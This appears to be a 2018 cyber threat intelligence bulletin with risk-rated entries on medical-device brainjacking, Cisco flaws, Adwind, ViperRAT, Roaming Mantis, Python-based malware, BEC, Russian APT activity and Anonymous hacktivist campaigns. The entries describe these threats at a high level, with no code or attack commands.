Target: Medical Devices

Attack Vector: Wireless Signal Interception

Summary: Brainjacking is the term for an internet connected medical device that has been compromised. There are a number of medical devices that are connected to the internet and therefore have the capacity to be compromised, such as pacemakers, defibrillators & intravenous drug delivery systems. Hacking the brain of a patient with a medically implanted stimulation device has now been proven as a potential target for actors. Threat actors could change the voltage delivered to the device, which could easily invoke sensory changes or denial, other disabilities or, in extreme circumstances, death.

The devices use wireless protocol for programming updates and to receive medical data from the patient. This makes the possibility of radio-based attacks a reality. Additionally, the possibility of patient data leakage, such as names and dates of birth from compromised wireless signalling, is a real possibility.

In the current political climate, there could be a variety of reasons why a bad actor may wish to carry out a brainjacking attack. These include political, cyber warfare, extortion, blackmail, revenge or even perverted amusement.

Currently, it is not possible to use this technology to inject inferences into the patient’s brain. Further developments and enhanced software will enable patient’s brainwave behaviours to be analysed to facilitate more precise care delivery. Therefore, if these signals were able to be intercepted and reverse engineered, it has been theorised that future attacks could be used to inject an inference into the patient’s brain.

Risk assessment summary: This threat has been assessed as 3F MODERATE. The possibility of this kind of attack is unlikely, due to extremely limited number of actors who could potentially look to exploit this weakness. In addition, the specialist nature of the equipment and the fact that the target is an extremely small section of the Internet of Things connected devices, also reduces the risk. However, due to current political tensions, if this type of vulnerability could be exploited or developed further, it could potentially have extremely serious consequences. The impact of any such incidents could have a critical threat to life.

Cisco Flaws Discovered

Cisco Flaws Discovered On Hardware Products As Well As Cisco Software

Target: Networking devices which have not rolled out Cisco patches, unpatched Cisco consumer software

Attack Vector: Exploitation of numerous detailed vulnerabilities

Summary: American industrial automation and information products supplier Rockwell Automation has recently disclosed the existence of a number of flaws within a range of switches they produce. Upon investigation, they discovered the actual flaw was due to the switches use of Cisco software which allows secure communications with enterprise networks, thus the vulnerability’s reside within Cisco’s software.

These flaws, while on a specific router are due to the software the routers rely on, are relevant to any routers which utilise Cisco software. Furthermore, three other flaws have been reported in Cisco client products which open up further attack vectors.

Risk assessment summary: The threat is assessed as 3d MODERATE. Whist the threat to some Rockwell devices has been mitigated with patching, it will take time to roll out across enterprise networks. They still present a danger given some of these vulnerabilities, CVE-2018-0171 in particular, has proved a popular attack vector and carries a high risk with the ability to cause downtime on a system. Further vulnerabilities, such as CVE-2018-0151, have the potential to cause damage to an organisation with the opportunity they provide to leak data, further increasing the risk.

In addition, it is probable we will find other routers which have similar vulnerabilities as they are also dependent on Cisco software. However, these devices will also have updates available, it is simply down to the organisation to roll out the patches Cisco supply. Furthermore, the risk of attack for Cisco products is reduced if all patches have been applied.


Adwind Discovered in Two New Malware Packages Being Dropped via Spam Campaigns

Target: Various

Attack Vector: Phishing / Data Theft

Summary: Two new malware strains delivering Adwind have resulted in a number of different final payloads including Loki, XTRAT and DUNIHI. Both campaigns have been designed to avoid detection whilst attempting to steal information. Both campaigns have been observed making use of a previously patched vulnerability, CVE-2017-11882.

Risk assessment summary: This threat is assessed at 3e MODERATE. As there has been such a large number of infections, the attack methods have been observed abusing a vulnerability for which patches are available. There is a risk that an infection could be spread across a network. In addition to detection avoidance, both strains come with new information stealing malware payloads, increasing the risk of loss of personal data and intellectual property.


#OpUSA active in early months of 2018

Target: Businesses within America or contributing to the country economically/politically

Attack Vector: DDoS attacks, Data breaches, website defacement, doxing

Threat Actor: Various, including @UnitedSecTeam, Phoenix420 and @Anonymous

Summary: Security Intelligence outlined the prospect of a reboot of the #OpUSA hacktivist campaign. This campaign focused on the United States and is mainly driven by anti-American sentiment in protest at their involvement in foreign wars, perceived corruption of the media, alleged war crimes and creation of the financial crisis. Now, in April 2018, further hacktivist activity has been observed, with @Phoenix420 delivering effective DDoS attacks against targets as well as hacks and data leaks being carried out by @UnitedSecTeam.

Risk assessment summary: The threat is assessed as 3d MODERATE. This is one of a number of campaigns currently active and comes at a time of heightened diplomatic tension between the US, its allies and Russia. These tensions seem set to continue due to East and West involvement in the war in Syria and the investigations of Russian influencing Western elections, raising the threat level.

The USA is set to continue its involvement in Syria, giving further motivation for threat actors to continue campaigns against the West including #OpUSA, #OpUK and #OpPeaceForSyria. The US also seems bound to continue to support Israel, with President Trump congratulating the nation on its 70th birthday on the 18th of April, declaring the US had “no better friends anywhere”. This declaration of the close bond between the US and Israel is a provocative move likely to antagonise other nations in the Middle East, including allies of Russia such as Iran. This raises the possibility that some hacktivist activity may be used as a cover for state sponsored entities.

influence operations

Russian APT activity remains focused on influence operations

Target: US/UK & France

Attack Vector: Hacks & Data Leaks/Phishing Campaign/Influence Operations

Threat Actor: Russian APT groups

Summary: During the current reporting period, international tensions between the UK, the US and Russia have continued to remain at a high level as a result of the Sergei Skripal poisoning incident, and the alleged chemical weapon attack in Dhouma, which resulted in British, French and American airstrikes being carried out against Syrian regime targets.

The recent publication of the UK/ US joint technical safety alert number TA18-106A detailing how Russian APT actors have been using routers to leverage potential access to a large number of networks, illustrates that the cyber domain is seen as a key battleground by state sponsored entities. This document raises fears that Russia and allied nations may be preparing for a major disruptive cyber-attack against UK targets in retaliation for Western action against the Assad regime. However, at the time of writing, it appears that the main focus of state sponsored actors continues to be the expansion of influence operations.

Risk assessment summary: It is currently assessed that Russian APT actors present a 2b HIGH threat. Whilst the recent technical advisory detailed ongoing Russian attempts to compromise systems, this should be considered ‘business as usual’, rather than a specific Russian response to the Skripal and Syria crisis.

Given the proximity of the Russia 2018 Word Cup tournament, it is unlikely that Moscow would sanction a ‘digital Pearl Harbour’, unless the military situation in Syria leads to direct confrontation between Western and Russian military assets. If such a situation were to develop, especially involving fatalities, then a ‘Critical’ cyber threat level would be appropriate.

At present, increased levels of information warfare appears to be the limit of Russian retaliation and this is likely to remain the case until after the World Cup. System users should remain vigilant for any indicators of compromise on systems and to be aware of the risk of socially engineered and plausible phishing emails. Additionally, any escalation in the military sphere in Syria is almost certain to result in a concurrent escalation in the cyber domain, which could result in disruptive attacks being initiated. Monitoring of the threat environment will continue in order to identify further actionable intelligence.

business email compromise

Gold Galleon Hacking Group demonstrate BEC a still serious risk

Target: Companies with weaker security to financially gain

Attack Vector: Business email compromise (BEC) attack

Summary: Researchers have identified the hacking group behind numerous widescale business email compromise (BEC) attacks costing businesses millions of dollars since last year. They go by the name Gold Galleon and appear to be a Nigerian-based group of at least 20 cybercriminals. Attackers are taking advantage of some industry’s negligent security and their use of outdated software in order to prepare targeted emails with malicious attachments to compromise their victims. Despite these attacks being focused on the maritime industry the techniques and tools used are risk to all along with the security failings that have allowed these attacks to occur found spanning all industries.

Risk assessment summary:

This threat is assessed as 3e MODERATE. If successful, this BEC scam could be capable of stealing user credentials to cause financial loss for an organisation. It can impersonate the initially compromised victim, or someone in an address book, in order to further the exploit. BEC scams involve minimal technical knowledge, malware or special tools and so the Gold Galleon hacking group can become experts in this very quickly. However, BEC scams are highly targeted attacks and it can be unlikely they will attack companies with sufficient security systems and processes.


ViperRAT seen active on Google Play store once again

Target: Users of Google Play Store

Attack Vector: Malware disguised in seemingly innocuous application

Summary: ViperRAT is a Remote Access Trojan (RAT) utilised by APT groups. In June 2016 it was observed being used to target and collect information on the Israeli Defence Force, affecting over 100 Israeli soldiers with over 8,000 files stolen. The malware was heavily scrutinised and received much attention from the media and analysts and after this disappeared. Due to the attack target, original suspicions centered on the Palestinian group Hamas being behind the RAT, yet the malware and social engineering techniques seemed too advanced for Hamas and it is now assumed to be the work of a far more advanced threat actor, possibly Iranian. In April 2018, ViperRAT resurfaced in the Google Play Store in a seemingly more sophisticated evolution.

As the RAT is directly on the Google Play Store, it suggests it no longer has to be pushed onto victim’s machines as a third party tool, requiring the user to enable installation, resulting in more infections. The malware possesses intelligence gathering capabilities and communicates with a Command and Control (C&C) server, feeding back collected information to threat actors.

Risk assessment summary: Whilst the threat from this version of malware is assessed as 4c LOW, the overall threat from the actors behind it is assessed as 3d MODERATE. Whilst the applications have been removed from the Google Play store, questions remain over the security of Android’s application marketplace. The Google Play Store’s screening process for applications can be bypassed if threat actors are mature, resulting in a high chance of consumers being exposed to this type of malware. This, coupled with the sheer volume of malicious applications created and used as a means of delivering malware, increases the threats of this kind in the future. The risk from this malware is also significant as it is able to control enough functions on a target device to not only collect a large amount of information, but also the means to export further malware to the target machines contacts through SMS.

The future risk this malware may pose is significant. It is suspected that the threat actors behind the malware are Iranian, and this malware may be part of a larger campaign against the West. It is likely the malware will be evolved and delivered in a more sophisticated format, driving up the risk and likelihood.

Roaming Mantis

Roaming Mantis malware

Target: Primarily Asia

Attack Vector: Mobile APK’s

Summary: Roaming Mantis malware is designed to capture personal information from a target device likely to aid in fraudulent activity against the victim. The attacks are made possible via a compromised router that has had its DNS settings changed to point the target device to a compromised website in a technique known as DNS highjacking.

However, due to the nature of the infected devices being connected to Wi-Fi and connected to multiple routers, the propagation of this malware likely to spread quickly through poorly administered devices.

Risk assessment summary: The threat is assessed as 4c LOW. According to telemetry obtained by Kapsersky Lab there were more than 6,000 detections coming from just over 150 unique users indicating at this stage a small and potentially targeted campaign to date, indicating the likelihood is lower at this stage with no immediate indication of an increase in targets on a wider scale. The malware was predominantly designed to target Asian countries and is unlikely to have much success in English speaking countries due to its heavily broken English although future versions could easily improve lures.

Due to Android being the most common mobile operating system it should not be underestimated how lucrative this malware could be to both this group in the future as well as other groups that could look to improve and how much it could be propagated via unsecured routers. The impact would be considered as moderate in the event of a successful infection due to the level of access an actor would gain both with the inbuilt phishing techniques as well as gaining access to call logs, messages etc.


Growing use of Python Malware hints at malware authors development

In 2018, there have already been several instances of Python-written components of malware. This was a developing trend across 2017 and is widely seen as either lower level actors trialing their hand at malware development or proof of concepts. However, recent developments seem to suggest that the threat landscape has surpassed just lower level actor’s use of Python, with examples of the language becoming much more commonplace.

Strategic assessment:

PyCryptoMiner was the first example of this development in 2018. Identified by F5 Labs, the crypto miner had recently been developed to include leveraging CVE-2017-12149 on J-Boss servers. Initially it used dictionary and brute force attacks against SSH login credentials of target Linux systems, deploying a base64-encoded Python script designed to connect to the C&C server. The additional payloads were also written in Python code.

Palo Alto also identified a Python-based malware, dubbed “PowerStager”. Thematically, Python-based malware often targets Linux systems, most likely due to the development environments the malware was used in. However, PowerStager generates Windows executables and then launches PowerShell scripts in order to execute a shellcode payload. It also had several configuration options, suggesting the authors were much more organised, and potentially skilled, than previously seen.

The targeting of a Brazilian management institution by two different versions of CannibalRAT written in Python also highlights an example were potentially more skilled actors have switched to using Python. The code targeted INESAP users and given its sole targeting of Brazil and use of obfuscation, Talos suggested it could have been for cyberespionage purposes.

It is noted that most malware making use of Python scripts rely on other languages for increased functionality. The latest example, a backdoor identified by Alien Vault, found 50% of the code was written in Python. However, the language’s ubiquitous use in malware development is an increasing trend and perhaps most poignantly seen in the GitHub DDoS random note. According to CyberReason, the note was written in a line of Python code that repeated multiple times.

Historically, Python-based malware was an indication of the lower skilled actors, as Python is viewed as a gateway language to learn coding. However, with more groups leveraging the scripts in successful operations, this arguments seems harder to sustain.


Anonymous Launch OpPeaceForSyria

Target: UK political organisations

Attack Vector: DDoS

Threat Actor: @Anonymous/@UnitedSecTeam

Summary: In response to airstrikes carried out against Syrian targets on the morning of Saturday 14th April 2018, The @Anonymous hacktivist collective has announced the launch of the cyber operation #OpPeaceForSyria. The aim of the operation is to show international opposition to the air strikes and to encourage citizens in Western countries to hold their governments to account regarding the military action.

Risk assessment summary: It is currently assessed that #OpPeaceForSyria presents a 3e MODERATE threat. Whilst most activity will comprise DDoS attacks, hacks, data leaks and website defacements may also be used against targeted organisations. At the time of writing no target list has been issued but statements by @UnitedSecTeam suggest the group is planning on moving beyond smaller targets. As the group is ideologically driven with an anti-government agenda, then politically linked organisations such as councils and the government sector targets are likely to be considered attractive targets.

Activists from the wider @Anonymous collective are almost certain to support the operation given the high profile of the attacks on Syria and the implications for global peace and security. A more worrying aspect of forthcoming hacktivist activity is that it may be used as a smokescreen for more damaging APT related activity. Both Russian and Iranian actors have previously used the pretext of being a hacktivist group as cover for their activity, indeed APT28 have used the hashtag #OpOlympics during hacks and data leaks of sporting related bodies such as WADA or the IOC. The group also claimed to be from the ISIS-linked UnitedCyberCaliphate during the service affecting attack against the French media organisation TVMonde5.

Given that malicious state-sponsored entities may seek to complicate blame attribution during the current period of international tensions, then it may be prudent to monitor hacktivist incidents more carefully, especially if such activity is targeting critical infrastructures or organisations. Monitoring of the threat environment will continue in order to identify any emerging target lists or other actionable intelligence.